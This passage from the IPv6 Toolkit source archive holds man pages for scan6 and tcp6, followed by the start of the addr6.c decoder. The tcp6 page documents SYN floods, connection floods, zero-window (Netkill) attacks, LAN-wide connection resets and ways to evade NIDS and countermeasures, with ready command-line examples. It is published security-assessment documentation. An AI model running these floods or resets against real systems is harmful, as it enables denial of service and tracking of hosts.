IPv6 prefix/range specified by means of the "\-d" option. For each service port, four target address ranges will be generated: * PREFIX::0\-5:HEX_PORT, * PREFIX::HEX_PORT:0\-5, * PREFIX::0\-5:DEC_PORT, and, * PREFIX::DEC_PORT:0\-5 That is, IPv6 address ranges will be generated with both the service port in hexadecimal notation, and the service port in decimal notation, since both types of addresses have been found in the wild. .TP .BI \-k\ IEEE_OUI ,\ \-\-tgt\-ieee\-oui\ IEEE_OUI This option is used to specify an IEEE OUI, such that the target of the scan is SLAAC addresses that employ the aforementioned IEEE OUI. .TP .BI \-K\ VENDOR ,\ \-\-tgt\-vendor\ VENDOR This option allows the user to specify a vendor name. scan6 will look-up all the correspoinding IEEE OUIs for such vendor, and then scan for SLAAC addresses that employ the aforementioned IEEE OUIs. .TP .BI \-m\ PREFIXES_FILE ,\ \-\-prefixes\-file\ PREFIXES_FILE This option specifies the name of a file containing a list of IPv6 addresses and/or IPv6 prefixes, one per line, in the same format as that used with the '\-d' option. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address/len # comment # comment IPv6_address .TP .BI \-w\ IIDS_FILE ,\ \-\-tgt\-iids\-file\ IIDS_FILE This option specifies the name of a file containing one IPv6 address per line. The Interface ID of each of those IPv6 addresses will be employed, together with the network prefix specified with the '\-d' option, to construct the IPv6 addresses to be probed. Since auto-configured addresses typically employ Interface IDs that are constant across networks, this option can leverage known IIDs to track such nodes across networks. Please see for further details. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address # comment .TP .BI \-W\ IID ,\ \-\-tgt\-iid\ IID This option specifies an IPv6 Interface Identifier (IID), with the same syntax as that of an IPv6 address (only the lowest-order 64 bits of the address will be employed). The specified Interface ID will be employed, together with the any network prefixes specified with the '\-d' option (or with the '\-m' option), to construct the IPv6 addresses to be probed. Since auto-configured addresses typically employ Interface IDs that are constant across networks, this option can leverage known IIDs to track such nodes across networks. Please see for further details. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address # comment .TP .BR \-T ,\ \-\-sort\-ouis This option, when used in conjunction with the "\-\-tgt\-vendor" option, tells the scan6 tool to "sort" the IEEE OUIs corresponding to a vendor. Namely, OUIs are employed in descending order, with the largest OUI used last (together with the smallest OUI). The rationale for this option is that when a vendor has been assigned multiple OUIs, chances are that the smaller (and "oldest") OUI was used for devices that have already been put "out of service", while the largest (and "newest") OUI has probably not yet been used for deployed devices. .TP .BI \-Q\ PREFIX/LEN ,\ \-\-ipv4\-host\ PREFIX/LEN This option allows the user to specify an IPv4 prefix. The aforementioned prefix is employed with the "\-\-tgt\-virtual\-machines" and/or "\-\-tgc\-ipv4\-embeded" options to reduce the search space. .TP .BI \-I\ INC_SIZE ,\ \-\-inc\-size\ INC_SIZE This option is used to specify the increment size for the lowest-order 16-bit word of an IPv6 address when an IPv6 address range is to be scanned. This option is particularly useful if the target network is assumed to contain a large number of nodes with consecutive addresses (maybe because the target network employs DHCPv6, or because the target network contains a large number of devices from the same manufacturer, thus employing consecutive MAC/SLAAC addresses). The increment size should be that of the assumed size of the "cluster" of nodes. .TP .BI \-r\ RATE ,\ \-\-rate\-limit\ RATE This option specifies the rate limit to use when performing a remote address scan. "RATE" should be specified as "xbps" or "xpps" (with "x" being an unsigned integer), for rate-limits in bits per second or packets per second, respectively. In general, the address scan should be rate-limited to about 80% (eighty percent) of the upstram bandwidth, such that probe packets are not lost as a result of network congestion. .TP .BR \-l\| ,\ \-\-loop This option specifies that the tool should periodically loop through the specified targets. It is mostly useful to e.g. when a node disconnects from the network, or for host-tracking purposes. .TP .BI \-z\ SECONDS ,\ \-\-sleep\ SECONDS This option specifies the amount of time (in seconds) that the tool should sleep in-between iterations over the specified targets. It is only meaningful when the '\-l' option is set. .TP .BI \-c\ CONFIG_FILE ,\ \-\-config\-file\ CONFIG_FILE This option is used to specify an alternative configuration file. If left unspecified, the tool will employ '/etc/ipv6toolkit.conf'. .TP .BR \-v\| ,\ \-\-verbose This option selects the "verbosity" of the tool. If this option is left unspecified, only minimum information is printed. If this option is set once, additional information is printed (e.g., the tool indicates which addresses are "link\-local" and which addresses are "global"). If this option is set twice, detailed information will be printed in the case the tool finds any problems when performing host scanning. .TP .BR \-h\| ,\ \-\-help Print help information for the .B scan6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B scan6 tool. \fBExample #1\fR # scan6 \-i eth0 \-L \-e \-v Perform host scanning on the local network ("\-L" option) using interface "eth0" ("\-i" option). Use both ICMPv6 echo requests and unrecognized IPv6 options of type 10xxxxxx (default). Print link-link layer addresses along with IPv6 addresses ("\-e" option). Be verbose ("\-v" option). \fBExample #2\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-virtual\-machines all \-\-ipv4\-host 10.10.10.0/24 Scan for virtual machines (both VirtualBox and vmware) in the prefix 2001:db8::/64. The additional information about the IPv4 prefix employed by the host system is leveraged to reduce the search space. \fBExample #3\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-ipv4\-embedded ipv4\-32 \-\-ipv4\-host 10.10.10.0/24 Scan for IPv6 addresses of the network 2001:db8::/64 that embed the IPv4 prefix 10.10.10.0/24 (with the 32-bit encoding). \fBExample #4\fR # scan6 \-d 2001:db8:0\-500:0\-1000 Scan for IPv6 addresses of the network 2001:db8::/64, varying the two lowest order 16\-bit words of the addresses in the range 0\-500 and 0\-1000, respectively. \fBExample #5\fR # scan6 \-d fc00::/64 \-\-tgt\-vendor 'Dell Inc' \-p tcp Scan for network devices manufactured by 'Dell Inc' in the target prefix fc00::/64. The tool will employ TCP segments as the probe packets (rather than the default ICMPv6 echo requests). \fBExample #6\fR # scan6 \-i eth0 \-L \-S 66:55:44:33:22:11 \-p unrec \-P global \-v Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). The Ethernet Source Address is set to "66:55:44:33:22:11" ("\-S" option). The probe packets will be IPv6 packets with unrecognized options of type 10xxxxxx ("\-p" option). The tool will only print IPv6 global addresses ("\-P" option). The tool will be verbose. \fBExample #7\fR # scan6 \-d 2001:db8::/64 \-w KNOWN_IIDS Perform an address scan of a set of known hosts listed in the file KNOWN_IIDS, at remote network 2001:db8::/64. The target addresses are obtaining by concatenating the network prefix 2001:db8::/64 with the interface IDs of each of the addresses fund in the file KNOWN_IIDS. \fBExample #8\fR # scan6 \-i eth0 \-L \-P global \-\-print\-unique \-e Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). Print only global unicast addresses ("\-P" option), and at most one IPv6 address per Ethernet address ("\-\-print\-unique" option). Ethernet addresses will be printed along with the corresponiding IPv6 address ("\-e" option). \fBExample #9\fR # scan6 \-m knownprefixes.txt \-w knowniids.txt \-l \-z 60 \-t \-v Build the list of targets from the IPv6 prefixes contained in the file 'knownprefixes.txt' and the Interface IDs (IIDs) contained in the file 'knowniids.txt'. Poll the targets periodically ("\-l" option), and sleep 60 seconds after each iteration ("\-z" option). Print a timestamp along the IPv6 address of each alive node ("\-t" option). Be verbose ("\-v" option). .SH SEE ALSO .BR ipv6toolkit.conf (5) draft\-ietf\-opsec\-ipv6\-host\-scanning (available at: .IR ) for a discussion of the IPv6 host\-tracking technique implemented by .B scan6 , and a proposal on how to mitigate such attacks. draft\-ietf\-6man\-stable\-privacy\-addresses (available at: .IR ) for a discussion of the scanning techniques implemented by .B scan6 , and a discussion of a number of aspects that should be taken into account when performing address scanning of remote networks. RFC 6583 (available at .IR ) for a discussion of the potential Denial of Service (DoS) when scanning remote networks. .SH AUTHOR The .B scan6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/tcp6.1000066400000000000000000000541631223702747200164250ustar00rootroot00000000000000.TH TCP6 1 .SH NAME tcp6 \- A security assessment tool for TCP/IPv6 implementations .SH SYNOPSIS .B tcp6 \-i INTERFACE [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-A HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-c OPEN_TYPE] [\-C CLOSE_TYPE] [\-P PAYLOAD_SIZE] [\-o SRC_PORT] [\-a DST_PORT] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-W WINDOW_MODE] [\-M WIN_MOD_MODE] [\-Z DATA] [\-N] [\-n] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-F N_SOURCES] [\-T N_PORTS] [\-f] [\-R] [\-L] [\-l] [\-z SECONDS] [\-r RATE] [\-v] [\-h] .SH DESCRIPTION .B tcp6 tool allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on TCP/IPv6 segments. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .B tcp6 can be employed to perform specific TCP connection-establishment and connection-termination sequences. For example, it can be employed to simulate a TCP "simultaneous open" scenario (see the "\-\-open\-mode" option) or to simulate a TCP "simultaneous close" scenario (see the "\-\-close\-mode" option). It can be employed to perform a number of resource-exhaustion attacks against TCP, such as SYN-flooding attacks, connection\-flooding attacks (see the "\-\-flood\-sources" and "\-\-flood\-ports" options), etc. Additionally, it can be employed to exploit attack vectors based on the TCP window (see the "\-\-window" option). .B tcp6 tool has two modes of operation: active and listening. In active mode, the tool attacks a specific target, while in listening mode the tool listens to TCP traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. Listening mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters listening mode to respond incoming packets with TCP segments. .B tcp6 supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no TCP segments are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with TCP segments. .SH OPTIONS .B tcp6 takes itS parameters as command\-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). If the tool is instructed to e.g. flood the victim with TCP segments from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. tcp6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. The network interface must be specified (i.e., the tool does not select any network interface "by default"). .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link-layer Source Address of the probe packets. If left unspecified, the link-layer Source Address of the packets is set to the real link-layer address of the network interface. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link-layer Destination Address of the probe packets. By default, the link-layer Destination Address is automatically set to the link-layer address of the destination host (for on-link destinations) or to the link-layer address of the first-hop router. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If the "\-F" ("\-\-flood\-sources") option is specified, this option includes an IPv6 prefix, from which random addresses are selected. See the description of the "\-F" option for further information on how the "\-s" option is processed in that specific case. Note: When operating in "listening" mode, the Source Address is automatically set to the Destination Address of the incoming packet. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "listening" mode). Note: When operating in "listening" mode, the Destination Address is automatically set to the Source Address of the incoming packet. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. It defaults to 255. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-y\ FRAG_SIZE ,\ \-\-frag\-hdr\ FRAG_SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This options specifies the size of the TCP payload. It defaults to 0 (i.e., empty TCP segments). .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the TCP Source Port. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the TCP/UDP Destination Port. .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS his option is used to set specific the TCP flags. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If this option is not set, and the tool operates in listening mode, the flags of the generated TCP segments are automatically set as follows: TCP segments elicited by SYNs have both the SYN and ACK flags set. All other TCP segments have the ACK bit set. .TP .BI \-q\ SEQ_NUMBER ,\ \-\-tcp\-seq\ SEQ_NUMBER This option specifies the Sequence Number of the TCP header. If left unspecified, the Sequence Number is randomized. If this option is left unspecified and the tool is operating in listening mode, the TCP Sequence Number is set to the Acknowledgement Number of the packet that elicited the TCP segment. .TP .BI \-Q\ ACK_NUMBER ,\ \-\-tcp\-ack\ ACK_NUMBER This option specifies the Acknowledgment Number of the TCP segment. If left unspecified, the Acknowledgment Number is randomized. If this option is left unspecified and the tool is operating in listening mode, the TCP Sequence Number is set to the Acknowledgement Number of the packet that elicited the TCP segment. .TP .BI \-V\ URG_POINTER ,\ \-\-tcp\-urg\ URG_POINTER This option specifies the Urgent Pointer of the TCP segment. If left unspecified, the Urgent Pointer is set to 0. .TP .BI \-w\ TCP_WINDOW ,\ \-\-tcp\-win\ TCP_WINDOW This option specifies the value of the TCP Window. If left unspecified, the Window is randomized. .TP .BI \-W\ WIN_MODE ,\ \-\-window\-mode\ WIN_MODE This option specifies how to operate the TCP window by means of the WIN_MODE parameter. Two modes are supported: \+ closed \+ modulated When the "closed" mode is selected, the TCP window will be set to 0 (i.e., "closed window"). If the tool estabishes new TCP connections, the initial window advertised during the TCP three\-way handshake will be that specified with the '\-w' option. However, once the connection has been established, the TCP window will be set to 0. This allows for the implementation of the so\-called Netkill attack, discussed in Section 7.1.1 of the document "Security Assessment of the Transmission Control Protocol (TCP)" (available at: ). When the "modulated" mode is selected, the TCP window will oscillate between alternate between two different values. These values, along the amount of time that each of them is "active", can be specified by means of the '\-M' ("\-\-win-modulate") option. The first of the aforementioned values is meant to close the window (hence it will typically be zero), while the second is meant to open the window. The goal of alternating between these two values is to circumvent a trivial mitigation against Zero-Window attacks implemented by some stacks where they enforce a limit on the maximum amount of time that the TCP advertised by a remote peer remains fully\-closed (i.e., set to 0). By changing the advertised window to some other (small) value every now and then, such a trivial "counter-measure" can be easily circumvented. .TP .BI \-M\ WIN_MOD_MODE ,\ \-\-win\-modulation\ WIN_MOD_MODE This option specifies the two values (and their respective duration) over which the TCP window will alternate. The value WIN_MOD_MODE hast the syntax "WIN1:TIME1:WIN2:TIME2", where the WIN1 and WIN2 parameters specify the window size for each of these periods, while the TIME1 and TIME2 parameters specify their respective time lengths. For example, setting "\-\-win\-modulation 0:60:10:30" will cause .B tcp6 to alternate between advertising a TCP window of 0 bytes for 60 seconds, and advertising a TCP window of 10 bytes for 30 seconds. This option will be typically employed along with one of the flooding options ("\-\-flood\-sources" an/or "\-\-flood\-ports") and the "\-\-data" option, such that multiple TCP connections are established, and the target TCPs keep their retransmission buffer full. In this scenario, the TCP window "modulation" option can be leveraged to evade trivial counter-measures implemented by some TCP stacks that try to mitigate Zero-Window attacks by enforcing a limit on the maximum amount of time the TCP window can be in the "closed state". .TP .BI \-c\ OPEN_MODE ,\ \-\-open\-mode\ OPEN_MODE This option specifies the connection\-establishment mode. The following modes are available: \+ simultaneous \+ passive \+ abort When the "simultaneous" mode is selected, .B tcp6 will respond to incoming SYN segments with other SYN segments, thus simulating a "simultaneous open" scenario. When the "passive" mode is selected, .B tcp6 will respond to incoming SYN segments with the typical SYN/ACK segments, thus leading to the traditional "three\-way handshake". Finally, when the "abort" mode si selected, .B tcp6 wil respond to incoming SYN segments with RST segments, thus aborting the incoming connections. For the most part, this option is useful for assessing the correct behavior of TCP implementations (e.g., support for "simultaneous opens"). .TP .BI \-C\ CLOSE_MODE ,\ \-\-close\-mode\ CLOSE_MODE This option specifies the the connection-termination mode. The following modes are available: \+ simultaneous \+ passive \+ abort \+ active \+ FIN\-WAIT\-1 \+ FIN\-WAIT\-2 \+ LAST\-ACK When the "simultaneous" mode is selected, .B tcp6 will respond to incoming FIN segments with FIN segments, thus simulating a "simultaneous close" scenario. When the "passive" mode is selected, .B tcp6 will respond to incoming FIN segments with the typical FIN/ACK segments, thus leading to the traditional TCP connection-termination sequence. When the "abort" mode is selected, .B tcp6 wil respond to incoming FIN segments with RST segments, thus aborting the corresponding connections. When the "active" mode is selected, .B tcp6 will start the connection\-termination sequence by sending a FIN segment. The FIN\-WAIT\-1, FIN\-WAIT\-2, and LAST\-ACK modes will result in connections in the FIN\-WAIT\-1, FIN\-WAIT\-2, and LAST\-ACK, respectively. It should be noted that in order for the remote TCPs to transition to the FIN\-WAIT\-1 or FIN\-WAIT\-2 states, the remote TCPs must perform the "active close". This can be trivially triggered for application protocols such as HTTP, but might not be feasible for other protocols. .TP .BI \-Z\ DATA ,\ \-\-data\ DATA This option is used to specify a payload that should be sent as the first data segment once a TCP connection has been established. It will typically include an application-layer request. Note: the string used for the DATA parameter can contain the "\\r" and "\\n" C\-style escape senquenced for representing "carriage return" and "line feed" (respectively). As an example, this option could be employed to send an HTTP request if set as '\-\-data "GET / HTTP/1.0\\r\\n\\r\\n"'. .TP .BR \-N\| ,\ \-\-not\-ack\-data This option instructs .B tcp6 not to acknowledge the TCP payload of incoming segments (when operating in listening mode). Note: By default, tcp6 will acknowledge both the payload and the flags of the incoming TCP segments. .TP .BR \-n\| ,\ \-\-not\-ack\-flags This option instructs tcp6 not to acknowledge the TCP flags (SYN and/or FIN) of incoming segments (when operating in listening mode). Note: By default, tcp6 will acknowledge both the payload and the flags of the incoming TCP segments. .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ LINK_ADDR ,\ \-\-block\-link\-src\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-K\ LINK_ADDR ,\ \-\-block\-link\-dst\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ LINK_ADDR ,\ \-\-accept\-link\-src\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-G\ LINK_ADDR ,\ \-\-accept\-link\-dst\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-F\ N_SOURCES ,\ \-\-flood\-sources\ N_SOURCES This option instructs the tool to send multiple TCP segments with different Source Addresses. The number of different source addresses is specified as "\-F number". The Source Address of each TCP segment is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix ::/0. .TP .BI \-T\ N_PORTS ,\ \-\-flood\-ports\ N_PORTS This option instructs the tool to send multiple TCP segments with different Source Ports. The Source Port of each TCP segment is randomly selected from the whole port number space (0\-65535). .TP .BR \-l\| ,\ \-\-loop This option instructs the tcp6 tool to send periodic TCP segments to the victim node. The amount of time to pause between sending TCP segments can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP .BR \-z\| ,\ \-\-sleep This option specifies the amount of time to pause between sending TCP segments (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BI \-r\ RATE ,\ \-\-rate\-limit\ RATE This option specifies the rate limit to use when performing a remote address scan. "RATE" should be specified as "xbps" or "xpps" (with "x" being an unsigned integer), for rate-limits in bits per second or packets per second, respectively. .TP .BR \-L\| ,\ \-\-listen This instructs the tcp6 tool to operate in listening mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP .BR \-v\| ,\ \-\-verbose This option instructs the tcp6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP .BR \-h\| ,\ \-\-help Print help information for the .B tcp6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B tcp6 tool. \fBExample #1\fR # tcp6 \-i eth0 \-s fc00:1::/64 \-d fc00:1::1 \-a 22 \-X S \-F 100 \-l \-z 1 \-v In this example the .B tcp6 tool is essentially employed to perform a SYN-flood attack against port number 22 of the host fc00:1::1. The tool uses the network interface "eth0" (as specified by the "\-i" option), and sends SYN segments (as specified by the "\-X" option) from the prefix fc00:1::/64 (as specified by the "\-s" option) to port 22 (specified by the "\-a" option) at the destination address fc00:1::1 (specified by the "\-d" option). The tool sends TCP segments from 100 different addresses (as specified by the "\-F" option) every one second (as specified by the "\-l" and "\-z" options). The tool will be verbose (as specified by the "\-v" option). \fBExample #2\fR # tcp6 \-i eth0 \-L \-X RA \-v In this example, the .B tcp6 tool is employed to perform a TCP connection-reset attack against all active TCP connections in the local network. The tool listens ("\-L") on the interface eth0 ("\-i eth0"), and responds to any TCP segments with a RST packet (with both the RST and ACK bits set). The tool will be verbose. \fBExample #3\fR # tcp6 \-i eth0 \-d fc00:1::1 \-a 80 \-L \-s fc00:1::/112 \-l \-r 1pps \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" \-\-close\-mode last\-ack \-\-flood\-ports 10 Flood the target system (fc00:1::1) with connections that stay in the LAST\-ACK state (on port 80), sending packets at a rate of one packet per second. For each forged address, 10 different (forged) ports are used. For each connection, .B tcp6 will send an HTTP application request. \fBExample #4\fR # tcp6 \-i eth0 \-d fc00:1::1 \-a 80 \-L \-s fc00:1::/112 \-l \-r 1000pps \-\-tcp\-flags auto \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" \-\-flood\-ports 10 \-\-window\-mode close Flood the target node (fc00:1::1) with TCP connections (on port 80). On each connection that is established, an HTTP request is sent, and the TCP window is immediately closed. For each forged IPv6 source address ten different TCP source ports are randomized. The bandwidth of the attack is limited to 1000 pps. .SH SEE ALSO "Security Assessment of the Transmission Control Protocol (TCP)" (available at: ) for a discussion of TCP vulnerabilities. .SH AUTHOR The .B tcp6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/tools/000077500000000000000000000000001223702747200151565ustar00rootroot00000000000000ipv6toolkit-1.5.1/tools/addr6.c000066400000000000000000001330371223702747200163310ustar00rootroot00000000000000/* * addr6: A tool to decode IPv6 addresses * * Copyright (C) 2013 Fernando Gont (fgont@si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: gcc addr6.c -Wall -o addr6 * * This program has been tested to compile and run on: Debian GNU/Linux 6.0, * FreeBSD 9.0, NetBSD 5.1, OpenBSD 5.0, and Ubuntu 11.10. * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "addr6.h" #include "ipv6toolkit.h" void usage(void); void print_help(void); int read_prefix(char *, unsigned int, char **); size_t Strnlen(const char *, size_t); unsigned int is_service_port(u_int16_t); unsigned int zero_byte_iid(struct in6_addr *); void decode_ipv6_address(struct decode6 *, struct stats6 *); void stat_ipv6_address(struct decode6 *, struct stats6 *); void print_dec_address_script(struct decode6 *); int init_host_list(struct host_list *); u_int16_t key(struct host_list *, struct in6_addr *); struct host_entry * add_host_entry(struct host_list *, struct in6_addr *); unsigned int is_ip6_in_list(struct host_list *, struct in6_addr *); int is_eq_in6_addr(struct in6_addr *, struct in6_addr *); unsigned int match_ipv6(struct in6_addr *, u_int8_t *, unsigned int, struct in6_addr *); void sanitize_ipv6_prefix(struct in6_addr *, u_int8_t); void print_stats(struct stats6 *); unsigned char stdin_f=0, addr_f=0, verbose_f=0, decode_f=0, print_unique_f=0, stats_f=0, filter_f=0; char line[MAX_LINE_SIZE]; int main(int argc, char **argv){ extern char *optarg; struct decode6 addr; struct stats6 stats; struct host_list hlist; int r; char *ptr, *pref, *charptr, *lasts; char pv6addr[INET6_ADDRSTRLEN]; uid_t ruid; gid_t rgid; struct passwd *pwdptr; unsigned int accept_type=0, block_type=0, accept_scope=0, block_scope=0, accept_itype=0, block_itype=0; unsigned int accept_utype=0, block_utype=0; unsigned char accepted_f=0, acceptfilters_f=0; /* Block Filters */ struct in6_addr block[MAX_BLOCK]; u_int8_t blocklen[MAX_BLOCK]; unsigned int nblock=0; /* Accept Filters */ struct in6_addr accept[MAX_ACCEPT]; u_int8_t acceptlen[MAX_ACCEPT]; unsigned int naccept=0; static struct option longopts[] = { {"address", required_argument, 0, 'a'}, {"stdin", no_argument, 0, 'i'}, {"print-decode", no_argument, 0, 'd'}, {"print-stats", no_argument, 0, 's'}, {"print-unique", no_argument, 0, 'q'}, {"accept", required_argument, 0, 'j'}, {"accept-type", required_argument, 0, 'b'}, {"accept-scope", required_argument, 0, 'k'}, {"accept-utype", required_argument, 0, 'w'}, {"accept-iid", required_argument, 0, 'g'}, {"block", required_argument, 0, 'J'}, {"block-type", required_argument, 0, 'B'}, {"block-scope", required_argument, 0, 'K'}, {"block-utype", required_argument, 0, 'W'}, {"block-iid", required_argument, 0, 'G'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "a:idsqj:b:k:w:g:J:B:K:W:G:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } /* addr6 does not need superuser privileges. But since most of the other tools in the toolkit do, the user might unnecessarily run it as such. We release any unnecessary privileges before proceeding further. If the real UID is not root, we setuid() and setgid() to that user and group, releasing superuser privileges. Otherwise, if the real UID is 0, we try to setuid() to "nobody", releasing superuser privileges. */ if( (ruid=getuid()) && (rgid=getgid())){ if(setgid(rgid) == -1){ puts("Error while releasing superuser privileges (changing to real GID)"); exit(EXIT_FAILURE); } if(setuid(ruid) == -1){ puts("Error while releasing superuser 